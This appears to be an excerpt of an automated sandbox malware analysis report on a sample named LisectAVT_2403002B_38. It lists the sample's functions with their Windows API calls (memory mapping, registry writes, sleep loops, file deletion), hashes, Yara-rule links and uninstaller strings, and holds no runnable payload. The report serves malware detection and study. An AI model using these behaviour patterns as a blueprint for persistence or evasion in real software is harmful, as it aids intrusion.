                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,022F21E7), ref: 023030C7
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,022F21E7), ref: 023030EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$CreateMappingView
                                  • String ID:
                                  • API String ID: 3452162329-0
                                  • Opcode ID: 7b97c3305b615fbeb739961c0f7610d33a3030961fba4d7da61d9934a10835ab
                                  • Instruction ID: 4d2c6f674d85c9c8ac517522e2d0159f694b0fe63f614dafe7898ba7378d8ac9
                                  • Opcode Fuzzy Hash: 7b97c3305b615fbeb739961c0f7610d33a3030961fba4d7da61d9934a10835ab
                                  • Instruction Fuzzy Hash: A701D6B4A40208EFD710CF84CA45F59B7F5BB08704F248288EA096B3C0C771AE41DB44
                                  Function 00415170 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0040E1BE,00000001), ref: 00415181
                                  • HeapDestroy.KERNEL32 ref: 004151B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Heap$CreateDestroy
                                  • String ID:
                                  • API String ID: 3296620671-0
                                  • Opcode ID: 1943bc7c832f535b68011679f5404c46088416c0c84797c873491ef1964ef284
                                  • Instruction ID: 785dcae1abef6bb6a41f40f9a4757498d538dafb9a4812b20194f0846cc82415
                                  • Opcode Fuzzy Hash: 1943bc7c832f535b68011679f5404c46088416c0c84797c873491ef1964ef284
                                  • Instruction Fuzzy Hash: D6E06D31F60B05EADB226F319D093EA37B4F780386F004C3BF004C41A4E77884819A8E
                                  Function 022FFE67 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseFindSleep
                                  • String ID:
                                  • API String ID: 1358061995-0
                                  • Opcode ID: 98f4eb5e9c5cfdd8cd7f81d54a60f014306d5e643757f15f7644c2b5f26269b8
                                  • Instruction ID: 212b85f8c60ced908838a2d3124d3a81dc68f7348cfc60bf5a5621d5da457d60
                                  • Opcode Fuzzy Hash: 98f4eb5e9c5cfdd8cd7f81d54a60f014306d5e643757f15f7644c2b5f26269b8
                                  • Instruction Fuzzy Hash: BFE04FB2E402548BCB20CB94D8097A9B7B4FB08329F0006A9EB1893680D7300450CB55
                                  Function 0040C620 Relevance: 3.0, APIs: 2, Instructions: 5COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 0040C624
                                    • Part of subcall function 0040C5FA: GetModuleHandleA.KERNEL32(mscoree.dll,0040C629,?,0040FE5D,000000FF,0000001E,00000001,00000000,00000000,?,00411A6B,0040B4E2,00000001,?,004119B7,00000018), ref: 0040C5FF
                                    • Part of subcall function 0040C5FA: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C60F
                                  • ExitProcess.KERNEL32 ref: 0040C62E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: f3722c443879d0d884ce09c41049c90811e2f0771dfda0bd44a2788c3cfeaa22
                                  • Instruction ID: 1026c6b9ad5427ec671a29fc0639f6b256145276ec8f23bf331f9d27c03a5470
                                  • Opcode Fuzzy Hash: f3722c443879d0d884ce09c41049c90811e2f0771dfda0bd44a2788c3cfeaa22
                                  • Instruction Fuzzy Hash: F9B09230004100EADA052B21DD0A40D7B61EB40600B008529F04A14070CB715C50BA0A
                                  Function 022F3F98 Relevance: 2.7, APIs: 2, Instructions: 192sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 870f95c24599a8d231a121789ae976cddef83518ee6c7fe0087b6af9439f359b
                                  • Instruction ID: ed3065f60c9960aaa4c01b58ed4aeef8f76c71e1de96c560360e685c8d594a00
                                  • Opcode Fuzzy Hash: 870f95c24599a8d231a121789ae976cddef83518ee6c7fe0087b6af9439f359b
                                  • Instruction Fuzzy Hash: 6381E6B1E102298BEB64DB94CC91BAFB7B9FB44304F0446F9D30966285DBF55A84CF84
                                  Function 0230161B Relevance: 2.6, APIs: 2, Instructions: 103memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00015000), ref: 02301648
                                    • Part of subcall function 022FBD79: MapViewOfFile.KERNEL32(00000280,00000006,00000000,00000000,00015400,?,00000000), ref: 022FBDD7
                                  • GlobalFree.KERNELBASE(?), ref: 02301690
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFreeView
                                  • String ID:
                                  • API String ID: 3692339905-0
                                  • Opcode ID: e33f0addd75690af41e3e596515aa6fc96faa02b0b5113c7622be7bb47eb673f
                                  • Instruction ID: 0052428cbf8740db35f8f4e77ae324f3e916b010fe0ccf6cc2f225e2f23ad33b
                                  • Opcode Fuzzy Hash: e33f0addd75690af41e3e596515aa6fc96faa02b0b5113c7622be7bb47eb673f
                                  • Instruction Fuzzy Hash: 4331B6B5E40208AFEB14DF98DC95B9E77B8EB48B14F048324E919663C4D7B56500CBB6
                                  Function 02300D09 Relevance: 2.5, APIs: 2, Instructions: 16sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00001000), ref: 02300D11
                                    • Part of subcall function 02300C04: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02300C8F
                                    • Part of subcall function 02300C04: RegCloseKey.KERNEL32(?), ref: 02300CFE
                                  • Sleep.KERNEL32(000493E0), ref: 02300D2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Sleep$CloseEnumValue
                                  • String ID:
                                  • API String ID: 1160872746-0
                                  • Opcode ID: 9674a81693986bfb8f29ca733f3f19ccbd89e6612de116791fda7a7b4757bc3b
                                  • Instruction ID: e22766a99a488c6ebcbf566ca7d82b19adc9c2fd926aad189fd5df583784ece4
                                  • Opcode Fuzzy Hash: 9674a81693986bfb8f29ca733f3f19ccbd89e6612de116791fda7a7b4757bc3b
                                  • Instruction Fuzzy Hash: CDD0A9B06C8214A7E30CA7B2A859B273A6CAB04792F000831FB0AC81C1CBA29420C536
                                  Function 022F61A0 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 022F635B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 510d83195ca26ef906f5d75e0654debd87bf73ed28ab3d1e1e4026e8dbf487be
                                  • Instruction ID: c412468e5b8ece6b8c7686c04956bec444d148ed1f9c58ddb65a398bbd254651
                                  • Opcode Fuzzy Hash: 510d83195ca26ef906f5d75e0654debd87bf73ed28ab3d1e1e4026e8dbf487be
                                  • Instruction Fuzzy Hash: B241B5B59502289FCB64CFA4CC88BEBB77DFB19300F104AE5E669D6140C7B58A95CF50
                                  Function 022F621E Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 022F635B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: c36a7b8c5f56135f5ca143e3cbd2f8d988b9ed292697f12c6644816e9aec6eaf
                                  • Instruction ID: cfe61cb9daebaefe41803316c944291eb26efe60cbef2004e5469866b11c253f
                                  • Opcode Fuzzy Hash: c36a7b8c5f56135f5ca143e3cbd2f8d988b9ed292697f12c6644816e9aec6eaf
                                  • Instruction Fuzzy Hash: 2F41B3B59502189BCB64CBA4C888BEAB77DFB15300F104AB4E72AD6184CBB59AC5CF50
                                  Function 022F19D2 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 022F1B06
                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 022F1B35
                                  • RegCloseKey.KERNEL32(?), ref: 022F1B47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$Close
                                  • String ID:
                                  • API String ID: 3391052094-0
                                  • Opcode ID: 4a820b692bf22d3722cab14c27ff5575e3859ed86392806f4b91f673ad4c2cbf
                                  • Instruction ID: f347d6b6c050039729b9ac3c781c7df7c2ffba5a4e4e160bc13109db39c3be95
                                  • Opcode Fuzzy Hash: 4a820b692bf22d3722cab14c27ff5575e3859ed86392806f4b91f673ad4c2cbf
                                  • Instruction Fuzzy Hash: 71313AB4910218EFCB58CF95CC45ADAF775BB48700F4081E9E78E6B248D7309AA1CFA0
                                  Function 022FBD79 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MapViewOfFile.KERNEL32(00000280,00000006,00000000,00000000,00015400,?,00000000), ref: 022FBDD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 549ac51da60840ea855a4b6e2ea414c60683571f7cf9259bc4b2ad05b5efb6a4
                                  • Instruction ID: 3bd10e4cf785d1584aee6a62ea0fd4a42721759d5022d67ecc4dbae85f173f2c
                                  • Opcode Fuzzy Hash: 549ac51da60840ea855a4b6e2ea414c60683571f7cf9259bc4b2ad05b5efb6a4
                                  • Instruction Fuzzy Hash: 63113DB1D80309ABDB10CF98DC49BAAB7B8EB08B28F104629E625673C4D7795551CB94
                                  Function 02303CC1 Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000004), ref: 02303D86
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID:
                                  • API String ID: 3356406503-0
                                  • Opcode ID: 4e8f81f8747aebcfbec0b7d9fec7df8a0f87c78491f333ef42d956414390507e
                                  • Instruction ID: 058450a56b9b4da83d9d3a68347eee636d07faa347d1a007885a7e0be65f9116
                                  • Opcode Fuzzy Hash: 4e8f81f8747aebcfbec0b7d9fec7df8a0f87c78491f333ef42d956414390507e
                                  • Instruction Fuzzy Hash: A411C6B1D112299BDB24DF44CC9CBAAB7B8BB48704F0446D9E60DA6281D7789BC4CF61
                                  Function 02303B39 Relevance: 1.5, APIs: 1, Instructions: 38registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 02303C94
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000004), ref: 02303D86
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$CloseQuery
                                  • String ID:
                                  • API String ID: 1795622825-0
                                  • Opcode ID: eeabe3a179ad5eb247ac1341b62379a93103b327b57e25b58015b749de6cda30
                                  • Instruction ID: 6988adeb8ac2533b70fb6cfacca3ac4754f181d7adc4493ca63fb5bc9538b572
                                  • Opcode Fuzzy Hash: eeabe3a179ad5eb247ac1341b62379a93103b327b57e25b58015b749de6cda30
                                  • Instruction Fuzzy Hash: 7F01A271E05219CBCB24CF59C8987A9F3B5FF44719F2086EAC919A66D1C7399A81CF20
                                  Function 02303D0B Relevance: 1.5, APIs: 1, Instructions: 36registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000004), ref: 02303D86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 744a571f1614cd32f359986fa404c2eec9c4d52a60d8da876e6a335fadbae73e
                                  • Instruction ID: fa9c495fbb54186df08a34d50062355f747c8e1c548751c62480e19998481471
                                  • Opcode Fuzzy Hash: 744a571f1614cd32f359986fa404c2eec9c4d52a60d8da876e6a335fadbae73e
                                  • Instruction Fuzzy Hash: 7E01DAB19102289BDB24DB54CD9CBDAB7B8FB48704F0446C9E60EA6281D774ABC4CF60
                                  Function 02300B90 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02300858: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02300901
                                    • Part of subcall function 02300858: DeleteFileA.KERNEL32(?), ref: 0230092A
                                    • Part of subcall function 02300858: Sleep.KERNEL32(00000400), ref: 02300962
                                  • RtlExitUserThread.NTDLL(00000000), ref: 02300BF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$CreateDeleteExitSleepThreadUser
                                  • String ID:
                                  • API String ID: 2529956594-0
                                  • Opcode ID: 9a141b47bdc44263919a4fc1fedd58b05c0055af5132100c3c8c4386ad3a66d5
                                  • Instruction ID: 2a6bb712d45f7f3c24a89e0b86e45d6a887bd79eb68e38a5269f87722919dd3d
                                  • Opcode Fuzzy Hash: 9a141b47bdc44263919a4fc1fedd58b05c0055af5132100c3c8c4386ad3a66d5
                                  • Instruction Fuzzy Hash: AAF0C8719401985FD712C758CC10BE6B7B9AF5D342F0044F9EB48D7340D6B05A848E65
                                  Function 023012EB Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02301305
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: ca70c905406c2ed91f7cf354e8b799c8ed2ec1ece052ae0ffea39194a179171e
                                  • Instruction ID: 8c524a58f7cf9b67c5f25bf5d0ef24fb43514d7a7a5eb9190e335ef135aca717
                                  • Opcode Fuzzy Hash: ca70c905406c2ed91f7cf354e8b799c8ed2ec1ece052ae0ffea39194a179171e
                                  • Instruction Fuzzy Hash: ECF037B9D40268CBDB20CFA8D84C7EEB774EB48325F0086D9E94993680C77499E1CF20
                                  Function 0047CBF5 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL(?,0047CB9D), ref: 0047CBFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser
                                  • String ID:
                                  • API String ID: 6842923-0
                                  • Opcode ID: 7f4059fc3427da56b87920dd1e36bee461900e3af5d1567191a4cb147eee4303
                                  • Instruction ID: fa2ad403143e6f43346fab1eb1d6a247e4742fcdfda3f7b3aa17fccad5e66896
                                  • Opcode Fuzzy Hash: 7f4059fc3427da56b87920dd1e36bee461900e3af5d1567191a4cb147eee4303
                                  • Instruction Fuzzy Hash: CFD0A9F02006048FDF108F698988478BAE4EF89320F11457CE8CBEB320E7789C809B08
                                  Function 02303E54 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 745d43be72e7235a85d2f5e153ea9174311f062101aa95a92e300ec3bec25edb
                                  • Instruction ID: 0f3361f8b72c567c4fcba981f11f86a57f8e2f11fa9aeeb0bb050be030fb11c6
                                  • Opcode Fuzzy Hash: 745d43be72e7235a85d2f5e153ea9174311f062101aa95a92e300ec3bec25edb
                                  • Instruction Fuzzy Hash: 68E0ECB6D00258CBCB20CB94D44979DF774E748321F1047A6DD1453290C7351990CE60
                                  Function 0230260C Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlExitUserThread.NTDLL(00000000), ref: 02302618
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExitThreadUser
                                  • String ID:
                                  • API String ID: 3424019298-0
                                  • Opcode ID: 33290f14dbeac9cd97e725652c2fc6779ec58a1eec305dc88e2e3e548e39726f
                                  • Instruction ID: 645e851f5d718d4d453271303dca4bebbc17c380ece7a11cd60d13793b2dd46b
                                  • Opcode Fuzzy Hash: 33290f14dbeac9cd97e725652c2fc6779ec58a1eec305dc88e2e3e548e39726f
                                  • Instruction Fuzzy Hash: 52D0C9B6E486198BC710CF99A8067AEF7B0FB49732F10477ADE25937C0D73114218AA1

                                  Non-executed Functions

                                  Function 0040A0D0 Relevance: 42.2, APIs: 5, Strings: 19, Instructions: 201COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiSetSelectedDevice.SETUPAPI(?,?), ref: 0040A13E
                                  • _memset.LIBCMT ref: 0040A15C
                                  • SetupDiCallClassInstaller.SETUPAPI(00000005,?,?), ref: 0040A2D5
                                  • SetupDiRemoveDevice.SETUPAPI(?,?), ref: 0040A2E9
                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,?,00000009,?,?,00000100,00000000), ref: 0040A17D
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  • DelReg HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\Uninstall, xrefs: 0040A2C1
                                  • Win98, xrefs: 0040A297
                                  • Yes, xrefs: 0040A219, 0040A30B
                                  • Provider, xrefs: 0040A1AC, 0040A1BC
                                  • DriverPath, xrefs: 0040A188
                                  • GetReg InfFile=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\InfPath, xrefs: 0040A194
                                  • After LeaveDriverStoreCache comparison., xrefs: 0040A344
                                  • Del {windir}\INF\OTHER\{InfFile}, xrefs: 0040A338
                                  • Del {windir}\INF\{InfFile}, xrefs: 0040A32C
                                  • UninstCommandClass::RemoveDeviceCallBack, xrefs: 0040A11F
                                  • DelReg HKLM\System\{*ControlSet}\{DriverBaseRegPath}\{DriverPath}, xrefs: 0040A2EF
                                  • RemoveDeviceStyle, xrefs: 0040A24B
                                  • Install ITB Driver, xrefs: 0040A209
                                  • Microsoft, xrefs: 0040A1C8
                                  • Win95, xrefs: 0040A279
                                  • LeaveDriverStoreCache defined, leaving INFs., xrefs: 0040A31D
                                  • Win9x, xrefs: 0040A25B
                                  • LeaveDriverStoreCache, xrefs: 0040A2FB
                                  • GetReg Provider=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\ProviderName, xrefs: 0040A1A0
                                  Memory Dump Source
